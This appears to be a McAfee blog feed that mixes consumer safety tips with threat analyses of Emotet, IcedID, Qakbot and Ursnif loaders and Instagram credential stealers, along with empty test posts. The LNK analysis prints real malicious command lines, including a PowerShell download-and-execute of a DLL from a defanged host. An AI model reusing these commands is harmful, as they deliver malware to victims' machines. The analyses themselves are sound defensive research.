Interested in building your career at a company where you can belong? Search our openings!

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Kids & Cash Apps: What Parents Need to Know

By Toni Birdsong — July 5th 2022 at 18:06

Fewer people carry cash these days, kids included. This growing paperless reality fast-forwards the parenting task of educating kids on financial responsibility. As of 2021, most cash apps allow kids 13 and up to open accounts (previously, the age was 18). Kids can also get a cash app debit card for retail purchases. But while cash apps are a popular and convenient tool, they come with some risks families should consider.  

Instant Transactions 

Cash apps allow kids to exchange money with friends directly from a secondary established account, much like handing another person cash. Cash apps have become a popular tool with kids and an easy way to split costs or pay someone for a purchase. Cash apps also come in handy for families and allow parents to instantly send their children money for daily expenses such as school or sports fees, meals, purchases, or entertainment. Some common cash apps include Venmo, Zelle, Cash App (Square), Pay Pal, Zelle, and Facebook Pay, among others.   

Some Risk 

Sounds awesome right? But with ease comes risk. Most money transfer app funds are not FDIC insured. That means if your child (or you) accidentally sends money to an unintended recipient, they may have a tough time recovering those funds.  

Every app comes with some degree of risk. While the leading cash apps are considered secure and can be used with little concern, there’s always the potential of a cyber crook finding a security loophole that exposes your money, banking information, and identity.  

10 Cash App Safety Tips for Families 

  1. Discuss the risks. Clicks within a cash transfer app equal real cash. Help your kids understand digital money is equal to actual dollars. Take the time to discuss current scams and how to practice extra care when using cash apps.  
  2. Use safeguards. Using security best practices is not a skill that comes naturally to most people. It’s something that must be practiced and improved constantly. Just like computers, mobile devices can be infected with viruses and malware. One way to protect mobile devices (and cash apps) is to subscribe to a mobile antivirus product, such asMcAfee Mobile Security, which includessafe browsing, scanning for maliciousapps, and locating your device if it is lost or stolen. 
  3. Layer up app security. In addition to an antivirus tool, guide your kids in how to add additional security to their cash apps. Guide them in how to follow password security protocols and how to add protection in the form of a PIN code, facial ID, or fingerprint ID. While you are at it, make sure your child locks their device in the same way. These steps offer more protection in case your child’s phone is stolen or lost, and a stranger attempts to use the cash app.  
  4. Slow down and verify. As fast as kids’ fingers move on keypads, advise your child to slow down and verify spelling and a recipient’s account address when using a cash app. Most cash app providers will not help users recover misdirected funds. One typo or clicking on the wrong Jake Williams in the recipient list can cost you or your child big bucks.  
  5. Only connect with friends.When using cashapps, advise kids to only exchange money with people they know. Scammers have been known to befriend minors only to ask for a loan or offer goods or services. Once the payment is sent, the scammer instantly deletes their accounts and is gone without a trace.  
  6. Stay on top of cash app scams. CheckBBB Scam Trackerto see how bad actors are targeting cash app users. In searching cash app scams on this site, consider reading the personal stories (click “details” of each reported scam) of the people who have been victimized. This might be a very effective way to converse with your kids about the natural consequences of online scams.  
  7. Safeguard personal data. Remind kids not to share their email, address, or other information. Also, avoid clicking pop-up ads, trendy quizzes, and random website URLs designed to plant malware on a device that steals bits and pieces of personal info that can be used for various attacks, including financial and identity theft.  
  8. Link your app with a credit card. If possible, consider linking your child’s cash app to a credit card rather than a bank account. Debit cards remove cash from an account instantly, but credit cards offer consumer protection in cases of fraudulent transactions. The one drawback is that a credit card company will charge interest on your balance.  
  9. Keep app balances low. Cyber crooks can’t steal funds that aren’t there. For that reason, it’s wise to keep balances low in your child’s cash app account.  
  10. Teach financial literacy basics. The cash app conversation is an excellent opportunity to begin or expand your family’s conversation on financial literacy. Here are several helpful resources that will help you teach your kids financial literacy at any age.     

The use of cash apps is here to stay and, no doubt, an integral part of the overall paperless fast track we’re all on. Guiding kids into this realm equipped with knowledge and confidence is a powerful way parents can help kids enjoy the responsibility of money without falling prey to digital risks.     

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Over 10 Million Facebook Users Hacked in Ongoing Phishing Scam

By McAfee — July 5th 2022 at 17:57

In this digital age, communicating online and through our devices has become the norm. From sharing highlights of last night’s game to sending cute animal videos back and forth, so much of our connectedness happens virtually. It’s become so easy to chat with friends and loved ones through social media that we don’t even have to think about it. We know who’s on the other end of the screen, so why would we worry? We know our friends would never send us a malicious link that would steal our information, so why be cautious? Right? 

Not necessarily. Though a message or link may seem like it’s coming from a friend, it’s also possible that it was sent without their knowledge. There are many ways for hackers to scam people very believably. The latest Facebook Messenger hack is just one of many examples. 

Facebook Frenemies 

According to PIXM, Facebook users have been conned for several months by a phishing scam that tricks them into handing over their account credentials. Users are shown a fake login page that copies Facebook’s user interface, giving it the illusion of being real. When someone enters their credentials, their password and login combo is sent to the hacker who then sends out the same link and fake login to the user’s friends through Facebook Messenger. Any user who clicks the link is asked to fill out their credentials, and the cycle repeats. PIXM estimates that over 10 million Facebook users have been duped by this scam since 2021. 

This hacker was able to utilize a technique to evade Facebook’s security checks. When a user clicks on the link in the Messenger app, the browser redirects to a legitimate app deployment service, then redirects again to the actual phishing pages with advertisements and surveys that accrue revenue for the hacker. Using this legitimate service link prevents Facebook from blocking it without blocking other legitimate apps and links as well. Researchers say that even if Facebook managed to block one of these links, several others are created with new unique IDs every day to replace it. 

Phishing scams like these are harder to detect due to the realistic-looking interface on the login pages and that these malicious links are seemingly coming from friends and family. However, there are always key things to look out for when faced with phishing scams. 

Swim Away From These Phishes 

Scams don’t always come from overtly sketchy emails or text messages from strangers. Sometimes they can (unintentionally) come from people we know personally. This isn’t to say that your friends online can’t be trusted! However, it’s important to always be cautious and keep an eye out for any odd behavior to stay on the safe side. Here are some key things to look out for when faced with potential malicious phishing scams: 

  • Lack of personalization. These types of scams may be coming from online friends you don’t speak to often, if at all. If someone you rarely speak to is sending you links out of the blue, that’s an automatic red flag. But if you’re still unsure or if this is coming from someone you know well, pay close attention to the message, the greeting (if any), and whether it’s personalized or not. If it seems cold or overly general, avoid it!
  • Links don’t look quite right. If you’re receiving a link through email, hover over the URL without clicking on it to see the link preview. If it looks suspicious, delete it altogether. For links being sent through social platforms, check to see if the URL matches the content in the message being sent to you or if there is a preview attached. If these things don’t match or aren’t present, it’s best to play it safe and stay away.
  • Spelling and tone seem off. If the message you’re receiving is riddled with spelling or grammar mistakes, proceed with caution, especially if it’s unlike your friend to have those types of errors in their messages. In that same vein, if the tone of the message doesn’t match the typical vibe of the person you’re receiving it from, it’s best to ignore it and move on!
  • The message is telling you to act. Always be wary of a strange message and link asking you to act. If the message is telling you to download something, don’t click any links or attachments. Simply delete the message and carry on!

When in doubt, just ask! If you’ve received a message and a link from a friend online, simply ask if they meant to send it to you. If they didn’t send it themselves, not only did you dodge a bullet, but your friend is also now aware that they’ve been hacked and can take the necessary precautions to ensure their information is protected. And if they did mean to send it to you, then you can click the link knowing that it’s safe to do so. It’s always best to err on the side of caution when it comes to your online security. 

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It’s Social Media Day! Here’s How to Protect Yourself From Social Engineering Online

By McAfee — June 30th 2022 at 11:38

It’s Social Media Day! How are you celebrating? Reposting your very first profile picture from a decade ago? Sharing your most-loved status update or the photo you’re most proud of? This year, consider commemorating the day by learning more about how to keep your information safe. Enjoy your favorite platform, but be on the lookout for scams, such as social engineering. 

What is Social Engineering 

Social engineering is a cybercrime common to social media sites. It is a tactic where a cybercriminal lurks on people’s social media pages, gleaning personal information that they then use to impersonate them elsewhere. 

With more than half of the global population on social media, you may think that a cybercriminal will never single you out from such a huge pool; however, it is possible.1 Luckily, you only have to make a few, easy changes to your online habits to keep your valuable private information just that: private. Check out these tips to make smart decisions and be more confident about your and your family’s online security. 

Why Do Cybercriminals Care About Social Media? 

Think of the types of posts you share with your dozens – or even hundreds or thousands! – of followers: updates about your life, where you live, work, or favorite travel destinations, your hobbies, pets, family members, etc. All of these details, that only you and those closest to you should know, are a valuable commodity to cybercriminals. Plus, now that social media shopping is growing in popularity, the credit card information linked to accounts is sweetening the deal for cybercriminals. 

Here are a few social engineering scams that are common to social media.  

Credential stuffing

People commonly create passwords based on things, places, and people that are important. Have you ever published a 20 questions-style get-to-know-me post? Those contain a lot of valuable personally identifiable information (PII). With just a few of those details about your personal life, cybercriminals can make educated guesses at your passwords, a tactic called credential stuffing. If they’re able to crack the code to one of your accounts, they’ll then input that password and login variations in several other sites, especially online banking portals, to see if they can gain entry to those too. 

Fake contests 

You’ve won! Send us your banking information and address, and you’ll receive a package in the mail or a direct deposit to your bank account!  

But did you enter a drawing for a prize? Very rarely does anyone win something just by being a follower of a certain page. If you receive a message similar to the above, it’s likely a phisher trying to draw more PII and sensitive banking information out of you. Or, the message may have links within it that redirect to an untrustworthy site. If you regularly enter social media contests, keep a list and only respond to legitimate ones. Also, never give your banking information out over social media, private messages, or email. 

Emotional messages and posts

There are plenty of valid fundraisers and petitions circulating around social media; however, there are just as many social engineering scams that dupe social media users because they inspire a strong emotion in them. For example, there have been several scams around Ukrainian donation sites. Cybercriminals often use fear, anger, or sadness to inspire people to open their wallets and share confidential banking information. 

How to Protect Yourself from Social Engineering

Luckily, all it takes is a few smart habits to stop social engineers in their tracks. Consider the following tips and make these small changes to your social media usage: 

Edit your follower or friend lists

At this point, you’ve probably had several of your social media accounts active for over a decade. That means it’s time to do some cleaning out of your friends and followers lists. It’s best to only accept requests from people you personally know and would actually like to keep in the loop about your life. A friend and follower request from strangers could be cyber criminals in disguise. Also, consider setting your account to private so that your posts are invisible to strangers. 

Slow down and think 

Social engineering hacks often bank on people acting rashly and quickly because of strong emotion, either excitement, fear, sadness, or anger. If you see a post on your newsfeed or receive a direct message that gives you a tight window to respond and asks for PII, slow down and think before acting. Double-check the destination of every link in the message by hovering over it with your cursor and checking the link preview at the bottom of your browser screen. Be careful, because some link previews include slight misspellings of legitimate websites. As a great rule of thumb, be automatically skeptical of direct messages from people you do not personally know. And if a DM from a friend seems out of the ordinary, shoot them a text to confirm they actually sent it. It could be that their social media account was hacked and a criminal is spamming their followers.   

Create strong, unique passwords or passphrases

A password manager will go a long way toward ensuring you have unique, strong passwords and passphrases for every account. Not reusing passwords makes credential stuffing impossible. McAfee True Key stores all your logins and passwords and guards them with one of the strongest encryption algorithms available. All you need to do is remember your master password. It’s a great practice to also enable multifactor authentication whenever a website offers it. This makes it incredibly difficult for a cybercriminal to break into your online accounts with their educated guesses at your password. 

Live More Confidently and Safely Online 

Now that you know what to look for and the best tricks to be safe, you can feel more confident that you’re doing everything you can to protect your online accounts and private information. McAfee Protection Score can also help you take control of your online safety. This service allows you to monitor your current online safety and encourages you to take specific steps to improve it. Now you can enjoy digitally keeping in touch with your friends with peace of mind! 

1Smart Insights, “Global social media statistics research summary 2022 

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Rise of LNK (Shortcut files) Malware

By McAfee Labs — June 21st 2022 at 18:58

Authored by Lakshya Mathur

An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click create shortcut option or sometimes they are created automatically while running an application. There are many tools also available to build LNK files, also many people have built “lnkbombs” tools specifically for malicious purposes.

During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc.

Figure 1 – Apr to May month geolocation of the LNK attacks
Figure 1 – Apr to May month geolocation of the LNK attacks

In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.

Below is a screenshot of how these shortcut files look to a normal user.

Figure 2 _ LNK files as seen by a normal user
Figure 2 _ LNK files as seen by a normal user


With Microsoft disabling office macros by default malware actors are now enhancing their lure techniques including exploiting LNK files to achieve their goals.

Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.

We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.




Figure 3 _Emotet delivered via LNK file Infection-Chain
Figure 3 _Emotet delivered via LNK file Infection-Chain

Threat Analysis

Figure 4 _ Email user received having malicious LNK attached
Figure 4 _ Email user received having malicious LNK attached

In Figure 4 we can see the lure message and attached malicious LNK file.

The user is infected by manually accessing the attached LNK file. To dig a little deeper, we see the properties of the LNK file:

Figure 5 _Properties of Emotet LNK sample
Figure 5 _Properties of Emotet LNK sample

As seen in Figure 5 the target part reveals that LNK invokes the Windows Command Processor (cmd.exe). The target path as seen in the properties is only visible to 255 characters. However, command-line arguments can be up to 4096, so malicious actors can that this advantage and pass on long arguments as they will be not visible in the properties.

In our case the argument is /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

Figure 6 _ Contents of Emotet LNK file
Figure 6 _ Contents of Emotet LNK file

Once the findstr.exe utility receives the mentioned string, the rest of the content of the LNK file is saved in a .VBS file under the %temp% folder with the random name YIScZcZKeP.vbs

The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.

The downloaded DLL is then finally executed using the REGSVR32.EXE utility which is similar behavior to the excel(.xls) based version of the emotet.



Figure 7 _ IcedID delivered via LNK file Infection-Chain
Figure 7 _ IcedID delivered via LNK file Infection-Chain

Threat Analysis

This attack is a perfect example of how attackers chain LNK, PowerShell, and MSHTA utilities target their victims.

Here, PowerShell LNK has a highly obfuscated parameter which can be seen in Figure 8 target part of the LNK properties

Figure 8 _ Properties of IcedID LNK sample
Figure 8 _ Properties of IcedID LNK sample

The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time and then executes MSHTA with argument hxxps://hectorcalle[.]com/093789.hta.

The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this connects to Uri hxxps://hectorcalle[.]com/listbul.exe

The Uri downloads the IcedID installer 64-bit EXE payload under the %HOME% folder.



Figure 9 _ Qakbot delivered via LNK file Infection-Chain
Figure 9 _ Qakbot delivered via LNK file Infection-Chain

Threat Analysis

This attack will show us how attackers can directly hardcode malicious URLs to run along with utilities like PowerShell and download main threat payloads.

Figure 10 _ Properties of Qakbot LNK sample
Figure 10 _ Properties of Qakbot LNK sample

In Figure 10 the full target part argument is “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr”

When this PowerShell LNK is invoked, it connects to hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png using the Invoke-WebRequest command and the download file is saved under the %temp% folder with the name test.dll

This is the main Qakbot DLL payload which is then executed using the rundll32 utility.


As we saw in the above three threat campaigns, it is understood that attackers abuse the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim’s machine. Malicious LNKs are generally seen to be using PowerShell and CMD by which they can connect to malicious URLs to download malicious payloads.

We covered just three of the threat families here, but these files have been seen using other windows utilities to deliver diverse types of malicious payloads. These types of attacks are still evolving, so every user must give a thorough check while using LNK shortcut files. Consumers must keep their Operating system and Anti-Virus up to date. They should beware of phishing mail and clicking on malicious links and attachments.

IOC (Indicators of Compromise)

Type SHA-256 Scanner  
Emotet LNK 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71 WSS LNK/Emotet-FSE
IcedID LNK 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 WSS LNK/Agent-FTA

Suspicious ZIP!lnk

Qakbot LNK b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172 WSS LNK/Agent-TSR


URLs (Uniform Resource Locator) hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/








WebAdvisor All URLs Blocked


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Instagram credentials Stealers: Free Followers or Free Likes

By McAfee Labs — June 10th 2022 at 17:14

Authored by Dexter Shin 

Instagram has become a platform with over a billion monthly active users. Many of Instagram’s users are looking to increase their follower numbers, as this has become a symbol of a person’s popularity.  Instagram’s large user base has not gone unnoticed to cybercriminals. McAfee’s Mobile Research Team recently found new Android malware disguised in an app to increase Instagram followers. 

How can you increase your followers or likes? 

You can easily find apps on the internet that increase the number of Instagram followers. Some of these apps require both a user account and a password. Other types of apps only need the user to input their user account. But are these apps safe to use? 

Figure 1. Suspicious apps in Google Images 
Figure 1. Suspicious apps in Google Images

Many YouTubers explain how to use these apps with tutorial videos. They log into the app with their own account and show that the number of followers is increasing. Among the many videos, the domain that appears repeatedly was identified. 

The way the domain introduces is very simple. 

  1. Log in with user account and password. 
  2. Check credentials via Instagram API. 
  3. After logging in, the user can enjoy many features provided by the app. (free followers, free likes, unlimited comments, etc.) 
  4. In the case of free followers, the user needs to input how many followers they want to gain.  
Figure 2. A screenshot to increase the number of followers by entering in 20 followers.
Figure 2. A screenshot to increase the number of followers by entering in 20 followers.

When you run the function, you can see that the number of followers increases every few seconds. 

Figure 3. New follower notifications appear in the feed.
Figure 3. New follower notifications appear in the feed.

How does this malware spread? 

Some Telegram channels are promoting YouTube videos with domain links to the malware. 

Figure 4. Message being promoted on Telegram
Figure 4. Message being promoted on Telegram

We have also observed a video from a famous YouTuber with over 190,000 subscribers promoting a malicious app. However, in the video, we found some concerning comments with people complaining that their credentials were being stolen. 

Figure 5. Many people complain that their Instagram accounts are being compromised

Behavior Analysis in Malware 

We analyzed the application that is being promoted by the domain. The hidden malware does not require many permissions and therefore does not appear to be harmful. When users launch the app, they can only see the below website via the Android Webview.  

Figure 6. Redirect to malicious website via Android Webview

After inspecting the app, we observe the initial code does not contain many features. After showing an advertisement, it will immediately show the malicious website. Malicious activities are performed at the website’s backend rather than within the Android app. 

Figure 7. Simple 2 lines of initial code
Figure 7. Simple 2 lines of initial code

The website says that your transactions are carried out using the Instagram API system with your username and password. It is secure because they use the user’s credentials via Instagram’s official server, not their remote server. 

Contrary to many people’s expectations, we received abnormal login attempts from Turkey a few minutes after using the app. The device logged into the account was not an Instagram server but a personal device model of Huawei as LON-L29. 

Figure 8. Abnormal login attempt notification
Figure 8. Abnormal login attempt notification

As shown above, they don’t use an Instagram API. In addition, as you request followers, the number of the following also increases. In other words, the credentials you provided are used to increase the number of followers of other requesters. Everyone who uses this app has a relationship with each other. Moreover, they will store and use your credentials in their database without your acknowledgement. 

How many users are affected? 

The languages of most communication channels were English, Portuguese, and Hindi. Especially, Hindi was the most common, and most videos had more than 100 views. In the case of a famous YouTuber’s video, they have recorded more than 2,400 views. In addition, our test account had 400 followers in one day. It means that at least 400 users have sent credentials to the malware author. 


As we mentioned in the opening remarks, many Instagram users want to increase their followers and likes. Unfortunately, attackers are also aware of the desires of these users and use that to attack them. 

Therefore, users who want to install these apps should consider that their credentials may be leaked. In addition, there may be secondary attacks such as credential stuffing (=use of a stolen username and password pairs on another website). Aside from the above cases, there are many unanalyzed similar apps on the Internet. You shouldn’t use suspicious apps to get followers and likes. 

McAfee Mobile Security detects this threat as Android/InstaStealer and protects you from this malware. For more information, visit McAfee Mobile Security. 

Indicators of Compromise 


  • e292fe54dc15091723aba17abd9b73f647c2d24bba2a671160f02bdd8698ade2 
  • 6f032baa1a6f002fe0d6cf9cecdf7723884c635046efe829bfdf6780472d3907 


  • https[://] 

The post Instagram credentials Stealers: Free Followers or Free Likes appeared first on McAfee Blog.

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Instagram credentials Stealer: Disguised as Mod App

By McAfee Labs — June 10th 2022 at 17:13

Authored by Dexter Shin 

McAfee’s Mobile Research Team introduced a new Android malware targeting Instagram users who want to increase their followers or likes in the last post. As we researched more about this threat, we found another malware type that uses different technical methods to steal user’s credentials. The target is users who are not satisfied with the default functions provided by Instagram. Various Instagram modification application already exists for those users on the Internet. The new malware we found pretends to be a popular mod app and steals Instagram credentials. 

Behavior analysis 

Instander is one of the famous Instagram modification applications available for Android devices to help Instagram users access extra helpful features. The mod app supports uploading high-quality images and downloading posted photos and videos. 

The initial screens of this malware and Instander are similar, as shown below. 

Figure 1. Instander legitimate app(Left) and Mmalware(Right) 

Next, this malware requests an account (username or email) and password. Finally, this malware displays an error message regardless of whether the login information is correct. 

Figure 2. Malware requests account and password 

The malware steals the user’s username and password in a very unique way. The main trick is to use the Firebase API. First, the user input value is combined with This value and static password(=kamalw20051) are then sent via the Firebase API, createUserWithEmailAndPassword. And next, the password process is the same. After receiving the user’s account and password input, this malware will request it twice. 

Figure 3. Main method to use Firebase API
Figure 3. Main method to use Firebase API

Since we cannot see the dashboard of the malware author, we tested it using the same API. As a result, we checked the user input value in plain text on the dashboard. 

Figure 4. Firebase dashboard built for testing
Figure 4. Firebase dashboard built for testing

According to the Firebase document, createUserWithEmailAndPassword API is to create a new user account associated with the specified email address and password. Because the first parameter is defined as email patterns, the malware author uses the above code to create email patterns regardless of user input values. 

It is an API for creating accounts in the Firebase so that the administrator can check the account name in the Firebase dashboard. The victim’s account and password have been requested as Firebase account name, so it should be seen as plain text without hashing or masking. 

Network traffic 

As an interesting point on the network traffic of the malware, this malware communicates with the Firebase server in Protobuf format in the network. The initial configuration of this Firebase API uses the JSON format. Although the Protobuf format is readable enough, it can be assumed that this malware author intentionally attempts to obfuscate the network traffic through the additional settings. Also, the domain used for data transfer( is managed by Google. Because it is a domain that is too common and not dangerous, many network filtering and firewall solutions do not detect it. 


As mentioned, users should always be careful about installing 3rd party apps. Aside from the types of malware we’ve introduced so far, attackers are trying to steal users’ credentials in a variety of ways. Therefore, you should employ security software on your mobile devices and always keep up to date. 

Fortunately, McAfee Mobile Security is able to detect this as Android/InstaStealer and protect you from similar threats. For more information visit  McAfee Mobile Security 

Indicators of Compromise 


  • 238a040fc53ba1f27c77943be88167d23ed502495fd83f501004356efdc22a39 

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test article – McAfee Partner

By Sushant Khadilkar — June 10th 2022 at 08:25

test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…


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Test Test 2

By Jasdev Dhaliwal — June 9th 2022 at 05:00

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Test Post

By Jasdev Dhaliwal — June 9th 2022 at 04:48

McAfee Labs have been observing a spike in phishing campaigns that utilize Microsoft office macro capabilities. These malicious documents reach victims via mass spam E-mail campaigns and generally invoke urgency, fear, or similar emotions, leading unsuspecting users to promptly open them. The purpose of these spam operations is to deliver malicious payloads to as many people as possible. 

A recent spam campaign was using malicious word document to download and execute the Ursnif trojan. Ursnif is a high-risk trojan designed to record various sensitive information. It typically archives this sensitive data and sends it back to a command-and-control server. 


This blog describes how attackers use document properties and a few other techniques to download and execute the Ursnif trojan. 

Threat Summary 

  • The initial attack vector is a phishing email with a Microsoft Word document attachment. 
  • Upon opening the document, VBA executes a malicious shellcode 
  • Shellcode downloads the remote payload, Ursnif, and invokes rundll32.exe to execute it. 

Infection Chain 

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, Word downloads a DLL (Ursnif payload). The Ursnif payload is then executed using rundll32.exe 


Figure-1: flowchart of infection chain 

Word Analysis 

Macros are disabled by default and the malware authors are aware of this and hence present an image to entice the victims into enabling them.  

Figure-2: Image of what the user sees upon opening the document 


VBA Macro Analysis of Word Document 

Analyzing the sample statically with ‘oleId’ and ‘olevba’ indicates the suspicious vectors.. 


Figure-3: Oleid output 



Figure-4: Olevba output 







The VBA Macro is compatible with x32 and x64 architectures and is highly obfuscated as seen in Figure-5 


Figure-5: Obfuscated VBA macro 


To get a better understanding of the functionality, we have de-obfuscated the contents in the 2 figures shown below. 


Figure-6: De-obfuscated VBA macro (stage 1) 

Figure-7: De-obfuscated VBA macro (stage 2) 



An interesting characteristic of this sample is that some of the strings like CLSID, URL for downloading Ursnif, and environment variables names are stored in custom document properties in reverse. As shown in Figure-7, VBA function “ActiveDocument.CustomDocumentProperties()” is used to retrieve the properties and uses “StrReverse” to reverse the contents. 

We can see the document properties in Figure-8  


Figure-8: Document properties 


Payload Download and Execution: 

The malicious macro retrieves hidden shellcode from a custom property named “Company” using the “cdec” function that converts the shellcode from string to decimal/hex value and executes it. The shellcode is shown below. 


Figure-9: Raw Company property 


The shellcode is  written to memory and the access protection is changed to PAGE_EXECUTE_READWRITE. 


Figure-10: Code of VirtualProtect 



Figure-11: Shellcode’s memory and protection after calling VirtualProtect() 


After adding the shellcode in memory, the environment variable containing the malicious URL of Ursnif payload is created. This Environment variable will be later used by the shellcode. 


Figure-12: Environment variable set in Winword.exe space 



The shellcode is executed with the use of the SetTimer API. SetTimer creates a timer with the specified time-out value mentioned and notifies a function when the time is elapsed. The 4th parameter used to call SetTimer is the pointer to the shellcode in memory which will be invoked when the mentioned time is elapsed. 


Figure-13: SetTimer function (Execution of shellCode) 


The shellcode downloads the file from the URL stored in the environmental variable and stores it as ” y9C4A.tmp.dll ” and executes it with rundll32.exe. 


URL  hxxp:// 
CMD  rundll32 “C:\Users\user\AppData\Local\Temp\y9C4A.tmp.dll”,DllRegisterServer 



Figure-14: Exports of Downloaded DLL 


After successful execution of the shellcode, the environment variable is removed. 


Figure-15: Removal of Environment Variable 


Main Word Document  6cf97570d317b42ef8bfd4ee4df21d217d5f27b73ff236049d70c37c5337909f  McAfee LiveSafe and Total Protection  X97M/Downloader.CJG 
Downloaded dll  41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547  McAfee LiveSafe and Total Protection  Ursnif-FULJ 
URL to download dll  hxxp://  WebAdvisor  Blocked 


MITRE Attack Framework 

Technique ID  Tactic  Technique Details  Description 
T1566.001  Initial Access  Spear phishing Attachment  Manual execution by user 
T1059.005  Execution  Visual Basic  Malicious VBA macros 
T1218.011  Defense Evasion  Signed binary abuse  Rundll32.exe is used 
T1027  Defense Evasion  Obfuscation techniques  VBA and powershell base64 executions 
T1086  Execution  Powershell execution  PowerShell command abuse 



Macros are disabled by default in Microsoft Office applications, we suggest keeping it that way unless the document is received from a trusted source. The infection chain discussed in the blog is not limited to Word or Excel. Further threats may use other live-off-the-land tools to download its payloads.  

McAfee customers are protected against the malicious files and sites detailed in this blog with McAfee LiveSafe/Total Protection and McAfee Web Advisor. 

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8 Ways to Know If Online Stores Are Safe and Legit

By McAfee — June 8th 2022 at 13:07

The explosion of e-commerce sites has changed how we shop today, providing access to millions of online stores with almost unlimited selections.  

Just as you would take basic precautions in a brick-and-mortar store — perhaps hiding your PIN number while paying and making sure the business is legitimate — you should also practice safe shopping habits online. 

Here are eight ways you can avoid fake websites and other online scams and ensure that you’re dealing with legitimate companies and safe online stores. 

Use the free McAfee WebAdvisor to check for safe sites

One of the best ways to tell if an online store is legit and avoid debit and credit card scams, domain name and subdomain name takeovers, and other problems is with a free and effective download like McAfee WebAdvisor. 

This smart tool helps you surf and shop with confidence, protecting you from malicious sites that can contain:  

  • Adware: Pop-ups that might be infected with malware 
  • Spyware: Software downloaded without the user’s consent, perhaps passing on sensitive personal information to advertisers or cybercriminals. 
  • Viruses: Pieces of code that can copy themselves and typically have a negative effect, such as slowing down your system or destroying data 
  • Phishing scams: When hackers send duplicitous emails designed to trick people into falling for a scam to reveal financial information, system credentials, or other sensitive data 

McAfee WebAdvisor is a free browser extension that downloads quickly and installs easily, working in the background automatically to protect you from malware and phishing as you surf, search, and enjoy online shopping. 

McAfee WebAdvisor works with Windows 10, 8.1, 8, and 7 (32- and 64-bit) computers and is compatible with these browsers: 

  • Internet Explorer 10.0 or later 
  • Microsoft Edge (Chromium-based) 
  • Microsoft Edge (Windows 10 only; Fall Creators Update required) 
  • Mozilla Firefox 
  • Google Chrome 

Here are other ways to make sure you know when you’re dealing with scammers online.  

Check the padlock in the address bar

When checking an e-commerce site’s credentials, start with the address bar. Often, hackers will use URLs that are very close to the real site’s URL but not quite the same. Look for typos or use Google to see if a search takes you to the same page. Also, look for a padlock icon in the address bar. 

Click the padlock and look at the drop-down menu that provides information, such as if the site has a valid certificate like SSL (verifying that the web address belongs to the company), how many cookies are in use, other site settings, and whether your information is safe when sent to this site. 

The protection is pretty good but not perfect since some cybercriminals have been able to replicate these padlocks or take over legitimate sites that have them. 

Verify the website’s trust seal

Trust seals, such as the TrustedSite certification, are stamps created by a certificate authority (CA) to confirm the legitimacy of a site. A trust seal tells visitors that they are on a safe site and the company that displays the mark prioritizes cybersecurity. Click on it, and you should be taken to a webpage that verifies the authenticity of the trust seal. 

Use the Google Transparency Report

Google’s Safe Browsing technology crawls through billions of web addresses every day on the lookout for unsafe websites. The technology discovers thousands daily — often legitimate sites that have been compromised. Warnings for unsafe sites pop up in your browser and on the Google search engine. You can also search specific URLs to see if a site has been compromised.  

Check the company’s social media presence

It’s worth checking a company on social media to see if they appear to have a genuine following and legitimate posts. The Better Business Bureau (BBB) also has suggestions for spotting fake social media accounts, including those on LinkedIn, Facebook, Twitter, and Instagram. You should look for: 

  • Accounts with poor or no content and stock or recycled images 
  • Poor engagement with followers 
  • Lack of transparency about who runs the account 
  • Phony reviews 
  • Links to phishing scams and malware 

Review the company’s contact info

Another way to test the legitimacy of an online retail store is to check its contact information. Does it have a physical address, phone number, and email contact? Does the email address on the contact page have the company domain name in it, or is it generic (like a Gmail address)? If you send an email, does it get delivered? 

Analyze the overall look of the website

Check to see if the e-commerce site looks as if it has been professionally produced or whether it has been thrown together with slapdash results. Are there typos, grammar errors, poor-quality images, and a sloppy design? Does it have a poorly worded return policy or no return policy at all?  

All the things that undermine the professional appearance and authenticity of a site should be red flags and convince you that you’re on a scam website 

Verify if there are company reviews

If the online company is a legitimate website (not a scam site) and has been around for a while, there should be authentic third-party reviews from previous customers. Review sites include Google My Business, Amazon, and Yelp. 

If the reviews are uniformly bad, on the other hand, you have another type of problem to confront. 

See how McAfee WebAdvisor can keep you safe while shopping online

Since virtual shopping is fast becoming the new norm, it’s important to guard against cybercriminals that are increasingly targeting retailers and their customers. A great way to shop with confidence is to use McAfee WebAdvisor, which is available as a free download. 

The web browser extension works tirelessly in the background to protect you as you browse and buy. Think of it as a gift to yourself so you can use the internet to its full potential while keeping your information protected. 

The post 8 Ways to Know If Online Stores Are Safe and Legit appeared first on McAfee Blog.

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How to Recognize an Online Scammer

By McAfee — June 8th 2022 at 12:45

The great thing about the internet is that there’s room for everyone. The not-so-great part? There’s plenty of room for cybercriminals who are hungry to get their hands on our personal information.  

